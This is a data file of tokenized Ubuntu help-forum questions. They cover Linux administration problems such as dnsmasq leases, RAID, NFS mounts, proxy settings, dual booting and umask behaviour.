515259	how can i make dnsmasq bindings in human readable format ?	i want to setup an alias or a script that will allow me show the dhcp bindings dnsmasq has . $ cat /var/lib/misc/dnsmasq.leases 1411349054 08:11:96 : e9:52 : ec 192.168.1.96 w11837894 * 1411413528 b4 : b6:76:0c : c9:4d 192.168.1.46 root-hp-9470m * 1411263016 00:1b:21:0e : f2 : bd 192.168.1.219 root-dell-dm061 * 1411357237 00:01:2e:4d:49 : bd 192.168.1.31 ata * 1411263041 00:30:67 : d2:25:65 192.168.1.51 root-ta75m * i can take the 1st column and do a date -d @ 1411349054 ( or awk ' { print $ 1 } ' /var/lib/misc/dnsmasq.leases | awk ' { print strftime ( `` % c '' ) } ' ) sun sep 21 20:24:14 cdt 2014 i am looking for a way in awk to format like this : sun sep 21 20:24:14 cdt 2014 08:11:96 : e9:52 : ec 192.168.1.96 w11837894 * mon sep 22 14:18:48 cdt 2014 b4 : b6:76:0c : c9:4d 192.168.1.46 root-hp-9470m * anyone have any ideas ?
515262	backup function	i am attempting to make a function that you provide it a file name , it then make a back up of the file and slaps on a time stamp to mark the file . once it time stamps the file it prints out all files with the same name . however when i run this nothing happens , no errors no nothing . any thoughts on what can be done to fix this ? the server i am running on is turbo slow this the sleep 1s are required . function bak ( ) { echo `` $ 1 '' find ./ -name `` $ 1 '' 2 > /dev/null |while read filename ; do cp $ filename ./ $ { filename # # */ } `date +. % y. % m. % d_ % h. % m. % s` ; done ; sleep 1s | chown -v -- reference . ./ '' $ 1 '' * ; sleep 1s | ls -la | find `` $ 1 '' * }
515266	the properties dialog box not working for any start menu program lubuntu 14.04	when lubuntu 14.04 first came out , the properties dialog was present for all start menu programs but did not work when right-clicked on as nothing happened and no other box popped up the the start menu program information , such as the executable info , etc . then the issue was fixed . now the issue has returned when i upgraded to lubuntu 14.04.1 . is there any way to retrieve the properties info pop-up box via a configuration file ? does the issue have to do with a faulty lxshortcut ? i noticed when i uninstalled the lxshortcut the properties tab disappeared . when i re-installed the properties tab returned however once again when you right-click on the properties tab nothing happens . any assistance would be greatly appreciated . thank you .
515267	how do i disable changing proxy settings ?	i 've got several machines , running 14.04.1 , for kids to access . each machine has accounts for each kid , as well accounts for several adults . although i 've set a system wide proxy use policy , it does n't get used by chrome . instead , i had to log into each kids account and set a proxy use policy , pointing to tinyproxy/dansguardian , for safe internet access . the problem is that , should the kids get an ounce of computer savvy , they 'll figure out that they can launch the proxy settings config panel from unity , then change the proxy settings to none , and completely bypass the `` safe '' internet scheme i 've setup . can anyone tell me how i can disable those user accounts from being able to modify their proxy settings ( not the `` system wide '' ones ... those arent used.. this is the per-user settings ) . thanks
515270	permission denied running files , yet i am root	i try to run a .sh file as root and it says 'permission denied ' do you know why ? do i have to do something requiring chmod ?
515272	ubuntu 14.4 needing a complicated boot process on acer aspire e 11	i have installed ubuntu 14.4 on a acer aspire e 11 running windows 8 . when i boot , i have to use the grub menu to enter recovery mode . from there , i must choose resume to have a normal boot or else it will not boot and just hang . is there a way to fix that ?
515274	format/build raid 5 with one 4k drive , three 512b	i have 4 wd 1tb drives which i want to 4x1tb raid5 . i am not sure what course of action to take next . how do i configure my 4th drive ( sde ) to align with the rest ? will this affect performance ? i rcv this msg ( which brings me here to ask these question ) : the device presents a logical sector size that is smaller than the physical sector size . aligning to a physical sector ( or optimal i/o ) size boundary is recommended , or performance may be impacted . fdisk -l shows : disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf324ba09 device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x38bcc1f0 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x570f77e7 device boot start end blocks id system /dev/sdd1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sde : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xeb665e7b device boot start end blocks id system
515276	how do i setup raid on my harddrives	yes hello i have 5 2tb hard drives in my computer i use it to record tv as a dvr for my tv one 2tb section has ubuntu 14.04 on it . i would like to use all the hard drives for tv show . how do i do this please be descriptive and if needed i can section off each drive if i have to to be like tv shows movies ect but i would rather not if possible . if this is not raid please tell me i can use gparted if needed its already installed .
515277	apt-get and aptitude seem to disagree -- do i really have broken packages ?	if i do aptitude search ~b i get a list of 78 broken packages . but 76 of them are n't even installed ( they have a status of pb ) . how can an installed package be considered broken ? ? but if i do apt-get -s install -f it says there is nothing to do , so apparently apt-get does n't think anything is broken . and given that aptitude thinks a package is broken , how do i figure out why it thinks the package is broken ? some output : # aptitude search `` ~i ~b '' ib foomatic-db-compressed-ppds - openprinting printer support - compressed ppds derived from the database ib xz-lzma - xz-format compression utilities - compatibility commands those really are the only two . but if i do just ~b then i get a bunch of uninstalled broken ( whatever that means ) packages . here are the first few ( of 76 ) : # aptitude search ~b pb bison - yacc-compatible parser generator pb compiz-fusion-plugins-extra - transitional dummy package . pb compiz-fusion-plugins-main - transitional dummy package . pb cpu-checker - tools to help evaluate certain cpu ( or bio as for dpkg , # dpkg-query -l xz-lzma desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-=============================-=============================-========================================================================== ii xz-lzma 5.1.1alpha+20110809-3 xz-format compression utilities - compatibility commands so what 's going on ? and how do i fix it ( if there 's even anything actually broken ) ?
515278	menus not interactive on dvd played in videos	new to dvd authoring ... just created a number of dvds using bombono 1.2.2 they work fine in dvd players , blue ray players , win 8 media player but on my ununtu 14.04 videos 3.10.1 player the menus are not interactive . other dvds played on the ubuntu/videos have interactive menus ...
515279	unable to nfs mount from ubuntu 14.04.1 lts against qnap nas	note , this is a cross posting question in the qnap nas community here : http : //forum.qnap.com/viewtopic.php ? f=35 & t=96526 & p=427018 # p427018 any comments and suggestions , as well as pointers to relevant information pieces are very appreciated . i can not nfs mount from my nfs client running ubuntu 14.04.1 ( lts ) against my nfs server ( qnap nas ) . my environment is : nfs server : qnap ts-669 pro running firmware 4.1.0 ( dated : 2014/06/12 ) nfs client : ecs liva ( a small barebone pc ) running ubuntu 14.04.1 lts desktop . the two systems are connected via 1000base-t ethernet and ip reacheable . name resolution is done by local registry ( /etc/hosts ) and getent hosts host-name command returns the correct and consistent ip address on both nodes . nfs service is enabled on the nfs server and no_limit access right is given on the specific share folder , namely `` /nfs '' , on the `` nfs host access '' tab of the `` shared folders '' configuration app : in fact , i can confirm it is world nfs exported via issueing the `` exportfs -rva '' command on nas . because ubuntu ( the nfs client ) does not install nfs client packages by default , i explicitly installed the nfs-common package as described in here : setting up nfs how-to ( https : //help.ubuntu.com/community/settingupnfshowto # nfs_client ) ; the rpcbind package seems to be installed by default . on the nfs client , if i run the command `` mount -t nfs nas : /nfs /mnt '' , it gives the output `` mount.nfs : connection timed out '' after five or 10 minutes later . the same result is returned even if i specify nfs version 3 protocol with -overs=3 option while trying to nfs mount . also the command `` showmount -e '' lists up the exported nfs shared folder ( directory ) names eventually , but it also takes five or 10minutes to complete . on the nfs server , the `` exportfs -rva '' command returns the following warning message , but i do believe the message does not relate with the problem ( i am accessing the nas via ssh in this code exmple ) : [ ~ ] # exportfs -rva exportfs : /etc/exports [ 1 ] : neither 'subtree_check ' or 'no_subtree_check ' specified for export `` * : /share/md0_data/public '' . assuming default behaviour ( 'no_subtree_check ' ) . note : this default has changed since nfs-utils version 1.0.x exportfs : /etc/exports [ 2 ] : neither 'subtree_check ' or 'no_subtree_check ' specified for export `` * : /share/md0_data/nfs '' . assuming default behaviour ( 'no_subtree_check ' ) . note : this default has changed since nfs-utils version 1.0.x exporting * : /share/md0_data/nfs exporting * : /share/md0_data/public on the nfs client , the mount command takes long time ( more than five minutes ) to complete . i specified the vers=3 option , because i understand qnap does not support nfs v4 by default and nfs v3 suffices my requirement . it does not matter whether or not specifying the tcp and/or nolock options ( same behavior ) . root @ livak5 : ~ # mount -t nfs -vvv -overs=3 , tcp , nolock nas : /share/md0_data/nfs /mnt mount : fstab path : `` /etc/fstab '' mount : mtab path : `` /etc/mtab '' mount : lock path : `` /etc/mtab~ '' mount : temp path : `` /etc/mtab.tmp '' mount : uid : 0 mount : euid : 0 mount : spec : `` nas : /share/md0_data/nfs '' mount : node : `` /mnt '' mount : types : `` nfs '' mount : opts : `` vers=3 , tcp , nolock '' mount : external mount : argv [ 0 ] = `` /sbin/mount.nfs '' mount : external mount : argv [ 1 ] = `` nas : /share/md0_data/nfs '' mount : external mount : argv [ 2 ] = `` /mnt '' mount : external mount : argv [ 3 ] = `` -v '' mount : external mount : argv [ 4 ] = `` -o '' mount : external mount : argv [ 5 ] = `` rw , vers=3 , tcp , nolock '' mount.nfs : timeout set for sun aug 24 11:24:44 2014 mount.nfs : trying text-based options 'vers=3 , tcp , nolock , addr=192.168.11.50' mount.nfs : prog 100003 , trying vers=3 , prot=6 mount.nfs : trying 192.168.11.50 prog 100003 vers 3 prot tcp port 2049 mount.nfs : prog 100005 , trying vers=3 , prot=6 mount.nfs : trying 192.168.11.50 prog 100005 vers 3 prot tcp port 41687 mount.nfs : mount ( 2 ) : connection timed out mount.nfs : trying text-based options 'vers=3 , tcp , nolock , addr=192.168.11.50' mount.nfs : prog 100003 , trying vers=3 , prot=6 mount.nfs : trying 192.168.11.50 prog 100003 vers 3 prot tcp port 2049 mount.nfs : prog 100005 , trying vers=3 , prot=6 mount.nfs : trying 192.168.11.50 prog 100005 vers 3 prot tcp port 41687 mount.nfs : mount ( 2 ) : connection timed out mount.nfs : trying text-based options 'vers=3 , tcp , nolock , addr=192.168.11.50' mount.nfs : prog 100003 , trying vers=3 , prot=6 mount.nfs : trying 192.168.11.50 prog 100003 vers 3 prot tcp port 2049 mount.nfs : prog 100005 , trying vers=3 , prot=6 mount.nfs : trying 192.168.11.50 prog 100005 vers 3 prot tcp port 41687 mount.nfs : mount ( 2 ) : connection timed out mount.nfs : connection timed out on the nfs client , portmapper seeems working just fine against nfs version 2 , 3 , and 4 : root @ livak5 : ~ # rpcinfo -p program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 57148 status 100024 1 tcp 52831 status on the nfs server , i tried to check if the pormapper is runing on it from the nfs client , since it does not have the rpcinfo command installed : root @ livak5 : ~ # nc -zv nas 111 connection to nas 111 port [ tcp/sunrpc ] succeeded ! root @ livak5 : ~ # rpcinfo -s nas program version ( s ) netid ( s ) service owner 100000 2,3,4 local , udp , tcp portmapper superuser 100011 2,1 tcp , udp rquotad superuser 100005 3,2,1 tcp , udp mountd superuser 100003 3,2 udp , tcp nfs superuser 100227 3,2 udp , tcp - superuser 100021 4,3,1 tcp , udp nlockmgr superuser 100024 1 tcp , udp status superuser the later command ( rpcinfo ) takes long time ( more than five minutes ) to complete which replicates the problem root cause , i believe . please note that on both the tcp ports , 2049 and 41687 , appropriate daemon processes are listening on nas . i can confirm this fact since the nc command returns instantly on the nfs client against nas as shown in the following output : root @ livak5 : ~ # nc -zv nas 2049 connection to nas 2049 port [ tcp/nfs ] succeeded ! root @ livak5 : ~ # nc -zv nas 41687 connection to nas 41687 port [ tcp/* ] succeeded ! strangely enough , i can nfs version 3 mount on nas itself as shown in the following output ( i am accessing the nas via ssh in this code exmple ) : [ ~ ] # mkdir /mnt2 [ ~ ] # mount -overs=3 nas : /share/md0_data/public /mnt2 [ ~ ] # df -k filesystem 1k-blocks used available use % mounted on /dev/ram0 154691 137854 16837 89 % / devtmpfs 1531580 4 1531576 0 % /dev tmpfs 65536 160 65376 0 % /tmp /dev/md9 521684 126312 395372 24 % /mnt/hda_root /dev/md0 11622485880 410664920 11211296672 4 % /share/md0_data /dev/md13 379888 259868 120020 68 % /mnt/ext tmpfs 32768 0 32768 0 % /.eaccelerator.tmp nas : /share/md0_data/public/11622485888 411189216 11211296672 4 % /mnt2 although it looks as if i have some sort of blocked ports problem on nfs client , but it seems ubuntu 14.04.1 does not enable ufw ( uncomplicated firewall , it is actually a front-end to iptables ) by default as shown in the following wiki document : uncomplicated firewall ( somehow , i can not put the wiki url in here ) . i can confirm nothing blocked on it by running command on the nfs client : root @ livak5 : ~ # iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination
515281	no min/max/close buttons in kubuntu 14.04	i recently installed kubuntu 14.04 . the windows dock to the upper left corner and can not be moved , resized , and there are no min/max/close buttons . kde-window-manager is installed and in the default applications the same is selected . please help.. !
515283	install alongside windows option missing	i had ubuntu 14.04 installed on my system , which i replaced with windows 8.1 . now , i 'm trying to re-install ubuntu to dual boot with windows . however , the installer is not detecting windows , and the only options i 'm seeing are to erase disk and install ubuntu , or the something else . i tried what this answer says , but fixparts exits with the message '' this disk appears to be a gpt disk . use gnu parted or gpt fdisk on it ! '' edit : running gdisk does n't show any errors , but does give the following message : partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . i think this might be because fixparts is somehow detecting the previous ubuntu partitions that windows overwrote . my current partitions look like this this ( /dev/sda4 is the windows partition , the 38 gb unallocated space is where i 'd like to install ubuntu ) : so , what should i do ? can i just use `` something else '' and install ubuntu to the unallocated space by creating ext4 partitions there ? and if i do that , how will i boot to windows , because the new bootloader will probably not include a windows entry as ubuntu has n't detected it ?
515284	flashplugin installer works for firefox but not chromium-browser	i 'm on ubuntu precise ( 12.04.5 lts ) and i do have flashplugin-installer installed . when i click on flash videos in chromium-browser i get `` an error occurred , please try again later '' . in firefox they display fine . i opened chrome : //plugins to see if the flash plugin is installed and indeed it 's not listed . also http : //www.codegeek.net/flash-version.php displays : `` you do not have flash player installed '' , while with firefox it says : you have flash player 11.2.202 installed . following some instructions on some ubuntu page i copied the plugin using sudo cp /usr/lib/flashplugin-installer/libflashplayer.so /usr/lib/chromium-browser/plugins/ and i started chromium using chromium-browser -- enable-plugins but this did n't help . chrome : //chrome/ says : version 36.0.1985.125 ubuntu 12.04 ( 283153 ) . what else can i try ?
515287	no such package beginner tutorials	i 'm using hydro . i am new to this . i was reading the book `` a gentle intro to ros '' by jason m. o'kane . i got up to the section `` creating a package '' . i was following the `` create a workspace '' and `` creatingpackage '' tutorials on wiki.ros.org when i came across a common problem , but none of the solutions seem to be working for me ( probably because i 'm a total newb and doing it wrong ) . here is what happens when i follow the tutorial : andrzej @ andrzej-thinkpad-t430 : ~ $ source /opt/ros/hydro/setup.bash andrzej @ andrzej-thinkpad-t430 : ~ $ mkdir -p ~/catkin_ws/src andrzej @ andrzej-thinkpad-t430 : ~ $ cd ~/catkin_ws/src andrzej @ andrzej-thinkpad-t430 : ~/catkin_ws/src $ catkin_init_workspace file `` /home/andrzej/catkin_ws/src/cmakelists.txt '' already existsandrzej @ andrzej- thinkpad-t430 : ~/catkin_ws/src $ cd ~/catkin_ws/ andrzej @ andrzej-thinkpad-t430 : ~/catkin_ws $ catkin_make base path : /home/andrzej/catkin_ws source space : /home/andrzej/catkin_ws/src build space : /home/andrzej/catkin_ws/build devel space : /home/andrzej/catkin_ws/devel install space : /home/andrzej/catkin_ws/install # # # # # # # # running command : `` make cmake_check_build_system '' in `` /home/andrzej/catkin_ws/build '' # # # # # # # # # # # # running command : `` make -j4 -l4 '' in `` /home/andrzej/catkin_ws/build '' # # # # andrzej @ andrzej-thinkpad-t430 : ~/catkin_ws $ source devel/setup.bash andrzej @ andrzej-thinkpad-t430 : ~/catkin_ws $ catkin_create_pkg beginner_tutorials std_msgs rospy roscpp usage : catkin_create_pkg [ -h ] [ -s [ sys_deps [ sys_deps ... ] ] ] [ -b [ boost_comps [ boost_comps ... ] ] ] [ -v pkg_version ] [ -d description ] [ -l license ] [ -a author ] [ -m maintainer ] [ -- rosdistro rosdistro ] name [ dependencies [ dependencies ... ] ] catkin_create_pkg : error : file exists : /home/andrzej/catkin_ws/beginner_tutorials/package.xml andrzej @ andrzej-thinkpad-t430 : ~/catkin_ws $ rospack depends1 beginner_tutorials [ rospack ] error : no such package beginner_tutorials i followed every step ( hence the repeats , things exist already , etc ) but that last line just really bothers me . i just want to move on ... for kicks , here is my .bashrc file ( or whatever you call it ) : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi source /opt/ros/hydro/setup.bash source /opt/ros/hydro/setup.bash i 'd appreciate any help .
515288	can not access the internet via terminal after proxy configuration	i recently installed backbox linux . at first when i tried to connect to the from terminal using my usb broadband connection ( no proxy ) there was no any issue . then i tried to set up proxy settings for our university 's network.i followed the steps of the izx 's answer in this article . then again i removed the text i changed , and tried to install some packages and tried to update , then terminal shows some errors like this failed to fetch http : //lk.archive.ubuntu.com/ubuntu/pool/main/e/emacs23/emacs23_23.3+1-1ubuntu9.2_amd64.deb can not initiate the connection to 3128:80 ( 0.0.12.56 ) . - connect ( 22 : invalid argument ) failed to fetch http : //lk.archive.ubuntu.com/ubuntu/pool/main/e/emacs23/emacs_23.3+1-1ubuntu9.2_all.deb can not initiate the connection to 3128:80 ( 0.0.12.56 ) . - connect ( 22 : invalid argument ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? what should i do ? ?
515289	how to get linksys wusb54gv2 working with ubuntu 12.04.5 ( 32-bit )	the older dell tower ( dell dimension 4600 ) that i 'm using does n't have wi-fi built in ( duh ) and ubuntu will not accept my network adapter . i have another computer to download files to and use to transfer them i just do not have internet connection on the computer in question . kinda new to ubuntu so i am completely in the dark right now , any help is greatly appreciated . using lsusb command brings up `` linksys wusb54g v2 802.11g adapter [ intersil isl3887 ] ''
515291	how to disable preventing rias from being repurposed	i have problem running my java applet without java warning . how can i disable the below warning ? . i run this page from cron so that it will automatically launch the java applet , but due to this warning , my project failed . how do i disable this warning ? my cron : */3 * * * * su fadabi -c `` display=:0.0 /usr/bin/firefox -new-window http : //xxx.cnn/iqms/packetloss/iqmspacket2.html ''
515292	how to get gui sudo password prompt without command line ?	currently , for all my commands that require root access , i have to type them out on a command line . i would like for the gui to prompt me to key in my password , when sudo is required , instead of having to type out the commands from command line . is there any way to enable this ? previously one version of ubuntu desktop had this feature out of the box . this version of ubuntu ( that i am now running ) i upgraded from a server installation . i will add , my user account is already added to sudo group . thus i can run commands such as sudo gedit or sudo apt-get but i 'm not able to install software in the ubuntu software center .
515298	dual boot windows 7 and ubuntu 14.04 on 512gb ssd grub error	a client bought a crucial mx100 ssd ( solid state drive ) 512gb to be installed in their laptop and wanted a dual boot system with windows 7 professional 64-bit on a 100mb and 150gb primary partition and ubuntu 14.04 lts 64-bit on a primary partition ext4 with a 4.5gb primary swap area . on reboot i received grub error ... no such partition exists grub rescue . i attempted boot repair disc but that also failed . url of boot repair summary is ... http : //paste.ubuntu.com/8115882/ i reinstalled ubuntu with various partition sizes and as primary and logical partitions with the same issue and even reinstalled windows using the entire drive and installed ubuntu alongside windows . same issue occurred and no dual boot is possible . fdisk -l output of 512gb ssd is ... disk /dev/sdc1 : 512.1 gb , 512110157824 bytes 255 heads , 63 sectors/track , 62260 cylinders , total 1000215152 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc1 does n't contain a valid partition table fdisk -l output of my 120gb ubuntu 14.04 lts installation ssd ( my desktop ) is disk /dev/sda2 : 111.0 gb , 110956118016 bytes 255 heads , 63 sectors/track , 13489 cylinders , total 216711168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sda2 does n't contain a valid partition table any help or information would be greatly appreciated ; - )
515302	can i install deepin desktop environment 2 in ubuntu 14.04 lts ?	i have tried to install deepin de from this . but it does n't work . in this article they have used ppa from `` raring ringtail . '' i want to install deepin de from trusty ppa . but i ca n't found the ppa . is there any ppa is available to install deepin de v2 to ubuntu 14.04 lts ? ?
515303	squid3 , webmin , zentyal server	first of all i 'm asking this question for getting clear information from expert friends , i mean actually it 's not a question it 's like asking ideas . i 'm making practice about squid3 on ubuntu 14.04.1 lts server , squid is a great proxy but configuration is a little bit hard for rookie users like me , so that 's why i tried to install webmin , i tried every solution i found on askubuntu and google but everytime ubuntu complain about dependency problems and did n't install . i was looking for a solution on askubuntu and found this comment says webmin is removed from ubuntu and not supporting anymore `` how to install webmin ? `` , so searched about ebox and could n't install ebox too , i tried every step in here `` https : //help.ubuntu.com/community/ebox '' but again there was dependency errors as well . during search i found this `` http : //www.zentyal.org/server/ '' , i 'm downloading and going to install this one but why webmin is not supported anymore and is there any alternatives without zentyal because as far as i understand zentyal is a commercial project and community version does n't include all features as commercial version does . is it really impossible to install webmin on ubuntu 14.04.1 lts server ? and can we trust the projects like zentyal ? i mean that kind of projects are stabil or trustable ? thanks in advance .
515304	compiling custom kernel with ubuntu patches	i have compiled my own custom kernel but it uses a modified source from github . it does n't have any patchset , or atleast in my knowledge , or any ubuntu patches like the one required by ureadahead . are there patches that they use or a way to create one to apply onto the one i used before ?
515307	problem to type few letters in kannada	i am using ubuntu 14.04 , i can type in kannada except few letters . it is unable to type these letters : ಅ ಆ ಇ ಈ ಉ ಊ ಋ ೠ ಎ ಏ ಐ ಒ ಓ ಔ. i ca n't type all ovals . ibus installed and in system settings-language support-language kannada is installed . and in text entry settings kannada ( kagapa phonetics ) added . even i add kannada also the same problem is coming . if i type a for ಅ the display will come as ' ಾ ' . all other letters can type .
515308	installing ubuntu in xenclient 5.1.3	how can i install ubuntu on xenclient 5.1.3 ? i installed it , but it seems that the ubuntu dont have graphical drivers ( ubuntu 14.04 ) .
515309	how can i install whatsappkack programm on ubuntu 14.04	i want to install whatsapphack program from whatsapphack.com , no linux version only windows and mac version seen
515310	can startup disk creator make a bootable cd/dvd ?	i can not create a bootable dvd disc using `` startup disk creator . '' it is creating bootable usb drives smoothly , but it shows `` no space '' when trying to create a bootable dvd disc . we need to create a bootable dvd disc because some old machines do not have the option of booting from usb devices . system information : ubuntu version 14.04 lts ( 32 bit ) starter disk creator : available k3b : available
515312	problem in installing moodle	how i can to install moodle in ubuntu 14.04 which is already installed in virtual box , i tried to follow the instruction from their site , but i stop in step six . i need your help as soon as possible .
515313	icons for images or videos never load in ubuntu 14.04 !	i am useing ubuntu 14.04 and i just recorded some videos of my desktop vir kazam and i noticed that the icons never load . so i thought that this is not a big issue , they 'll load eventually but they never did . so is the same with image files , the icon is not loading . how do i fix this ? thank you people . : )
515314	pdf mod extract	having pdf mod , i extracted a file ( 70 mb ) into 6 pieces.now , in each piece when i go to properties i still see 70mb when each of them is about 11-13mb.how can i change that ? thanks .
515315	managing rights to hard drives	i have a 500 gb hdd divided in to five partitions and an 3tb hd . ubuntu is installed one of the partitions on 500 gb hdd . i updated my ubuntu from ver 11 to ver 14 but after that i lost permissions to all partitions and the 3tb hardrive . everything was fine before . i tried logging in as root , chowm , chmod and gui but to no avail . any ideas how to fix this ? .
515317	view wireless networks through usb0 ?	this is my first post in these forums and i 'm somewhat of a noob to linux , so forgive me if my question seems ludicrous . i have ubuntu 14.04 and i 'm in need of a new wireless card for my compaq laptop , so i 'm using my android as a connection to the internet through the interface usb0 . my android is recieving its internet connection via wifi and i was wondering if there was a way to view the available wifi networks in my laptop through my androids wireless interface ?
515319	bug ? when creating a new administrator and creating a new	i have encountered this before , but not understanding what happend . i needed to do a reinstall , and i then was reluctant to change anything with accounts again . i now tried again and wanted to redo and delete accounts to get a fresher install . instead of using the administrator account daily , i wanted to create an admin account and a standard account for daily use . when i created the the new admin account of course reboot all the time . it wanted my old admin password when unlocking the user account admin setting , while inside the new admin account . even though i changed the old admin account to standard , it still asked for the old accounts password . after a reeboot , the system asked for the root password to unlock admin settings . i could not use the old or the new admin password . by chance i bumped into the passwd and terminal solution . this as i understand connected the root password to my new admin account . is this a correct assumption ? anyway , i find it strange that a advanced distro as ubuntu have had this bug for this long of a time . also some other bugs that i find strange that has not been resolved . but i also am thankful for all the work from volunteers of the linux system . i find that even though the lacks and bugs , it is still less frustrating than w8 . thats why i mostly use ubuntu instead of w8 .
515326	setting default umask to `` 027 '' and usergroups_enab to `` yes '' in /etc/login.defs	i do n't understand the following from : /etc/login.defs # if usergroups_enab is set to `` yes '' , that will modify this umask default value # for private user groups , i. e. the uid is the same as gid , and username is # the same as the primary group name : for these , the user permissions will be # used as group permissions , e. g. 022 will become 002 . # # prefix these values with `` 0 '' to get octal , `` 0x '' to get hexadecimal . # erasechar 0177 killchar 025 umask 027 # enable setting of the umask group bits to be the same as owner bits # ( examples : 022 - > 002 , 077 - > 007 ) for non-root users , if the uid is # the same as gid , and username is the same as the primary group name . # # if set to yes , userdel will remove the userâ´s group if it contains no # more members , and useradd will create by default a group with the name # of the user . # usergroups_enab yes after setting a directory 's group to a different user than the owner of the directory , and also setting the sticky bit on the directory so anything new created in it would adopt the group owner setting of its parent , the group permissions on new files i am creating in this directory are still adopting the owner 's permissions ( umask example : 022 - > 002 , 077 - > 007 ) . with my umask of 027 , the group on new files are getting read & write permissions ( 660 ) -- same as owner -- instead of just getting read permissions ( 640 ) . if my owner and group are different , why do n't these files maintain the 027 umask instead of switching to 007 ? update : i just noticed , without using the sudo command , chmod g+s does not take effect . so , when i also use sudo to create a file , the group and it 's permissions are what i expect ( 640 ) . is it normal for chmod g+s not to work without sudo ? ?
